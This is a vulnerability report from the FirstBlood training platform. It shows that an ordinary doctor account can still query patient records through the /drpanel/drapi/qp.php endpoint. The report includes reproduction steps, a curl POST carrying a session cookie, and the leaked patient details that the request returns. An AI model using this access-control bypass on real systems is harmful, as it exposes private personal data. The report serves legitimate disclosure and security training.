FirstBlood-#918 — A normal doctor still can access /drpanel/drapi/qp.php and search patients via a POST request
This issue was discovered on FirstBlood v2
On 2021-10-30, panya Level 7 reported:
Steps to reproduce:
- Register a doctor (e.g. with name
test
and test
as an invitation code).
- Login as the doctor with the credentials provided at step 1.
- Copy
drps
cookie session value (d8e66390655b44c158fac363a
in our case) and paste in an request like this:
curl -X POST 'https://73ba26106566-panya.a.firstbloodhackers.com/drpanel/drapi/qp.php' -H 'Cookie: drps=d8e66390655b44c158fac363a' -d 'name=a'
Actual result:
This information about patients will be displayed:
Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Jane Hugo<br>Address: Office 310, 83, Baker St, London, W1U 6AG<br>Telephone: 020 7034 7011<br>DOB: 05/07/1989<hr>Name: Melissa White<br>Address: St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT<br>Telephone: 07796 985353<br>DOB: 02/01/1992<hr>
Expected result:
A newly created doctor should not be allowed to use the /drpanel/drapi/qp.php
endpoint and search patients information.
P3 Medium
Endpoint: /drpanel/drapi/qp.php
Parameter: name
Payload: a
FirstBlood ID: 40
Vulnerability Type: Application/Business Logic
The endpoint qp.php use to respond to GET requests and it should only allow administrators to query for patient information however the developers only fixed the bug partially and it still allowed for doctors to query for patient information. query.php is related to this file and in v1 allowed for Doctors and admins, but query.php was fixed completely whereas qp.php was not.